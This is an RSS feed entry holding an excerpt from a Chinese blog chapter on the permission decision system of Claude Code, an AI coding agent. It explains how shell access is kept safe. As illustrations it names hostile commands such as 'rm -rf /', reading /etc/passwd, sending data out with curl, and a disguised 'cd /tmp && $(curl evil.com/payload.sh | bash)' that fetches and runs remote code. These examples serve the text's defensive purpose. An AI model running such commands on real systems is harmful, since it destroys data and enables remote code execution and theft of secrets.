<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>安全 on Last Stand</title><link>https://amatsuzero.github.io/LastStand/tags/%E5%AE%89%E5%85%A8/</link><description>Recent content in 安全 on Last Stand</description><generator>Hugo</generator><language>zh-cn</language><lastBuildDate>Tue, 09 Jun 2026 00:00:00 +0800</lastBuildDate><atom:link href="https://amatsuzero.github.io/LastStand/tags/%E5%AE%89%E5%85%A8/index.xml" rel="self" type="application/rss+xml"/><item><title>第6章 权限决策算法</title><link>https://amatsuzero.github.io/LastStand/posts/aiagentalgorithm/chapter-06/</link><pubDate>Tue, 09 Jun 2026 00:00:00 +0800</pubDate><guid>https://amatsuzero.github.io/LastStand/posts/aiagentalgorithm/chapter-06/</guid><description>&lt;h2 id="61-问题引入当-ai-获得了执行-shell-命令的能力"&gt;6.1 问题引入：当 AI 获得了执行 Shell 命令的能力&lt;/h2&gt;
&lt;p&gt;想象一个场景：你让 AI 助手帮你整理项目目录。它需要执行 &lt;code&gt;rm&lt;/code&gt; 命令删除临时文件、执行 &lt;code&gt;mv&lt;/code&gt; 命令重命名文件、执行 &lt;code&gt;sed&lt;/code&gt; 命令批量修改内容。这些操作本身无害，但同一个 &lt;code&gt;rm&lt;/code&gt; 命令，参数从 &lt;code&gt;rm ./tmp/*.log&lt;/code&gt; 变成 &lt;code&gt;rm -rf /&lt;/code&gt;，后果就是灾难性的。&lt;/p&gt;
&lt;p&gt;一个拥有 Shell 执行能力的 AI Agent，本质上获得了与用户等同的系统操作权限。它可以读取 &lt;code&gt;/etc/passwd&lt;/code&gt;，可以通过 &lt;code&gt;curl&lt;/code&gt; 将敏感数据发送到外部服务器，可以通过 &lt;code&gt;git push --force&lt;/code&gt; 覆盖远程仓库的历史。更隐蔽的是，恶意指令可能被藏在看似无害的命令中——&lt;code&gt;cd /tmp &amp;amp;&amp;amp; $(curl evil.com/payload.sh | bash)&lt;/code&gt; 表面上只是切换目录，实际上隐藏了一个远程代码执行。&lt;/p&gt;
&lt;p&gt;Claude Code 面对的核心挑战是：&lt;strong&gt;如何在保持工具可用性的同时，建立一套可靠的安全边界？&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;这不是一个简单的黑白名单问题。用户可能需要 &lt;code&gt;npm install&lt;/code&gt; 但不需要 &lt;code&gt;npm publish&lt;/code&gt;；可能需要 &lt;code&gt;git commit&lt;/code&gt; 但不需要 &lt;code&gt;git push --force&lt;/code&gt;；可能需要在项目目录内执行任意文件操作，但不应该触及 &lt;code&gt;~/.ssh/&lt;/code&gt; 或 &lt;code&gt;.git/config&lt;/code&gt;。权限决策必须是&lt;strong&gt;细粒度&lt;/strong&gt;的、&lt;strong&gt;上下文感知&lt;/strong&gt;的、&lt;strong&gt;多层防御&lt;/strong&gt;的。&lt;/p&gt;
&lt;p&gt;本章将深入 Claude Code 的权限系统源码，剖析其多层决策树算法、规则匹配引擎、AST 静态安全分析、AI 分类器协同决策等核心算法思想。&lt;/p&gt;
&lt;h2 id="62-权限模式状态机"&gt;6.2 权限模式状态机&lt;/h2&gt;
&lt;h3 id="621-六种权限模式"&gt;6.2.1 六种权限模式&lt;/h3&gt;
&lt;p&gt;Claude Code 定义了一组权限模式（Permission Mode），每种模式代表一种安全策略姿态。从源码 &lt;code&gt;types/permissions.ts&lt;/code&gt; 中可以看到：&lt;/p&gt;</description></item></channel></rss>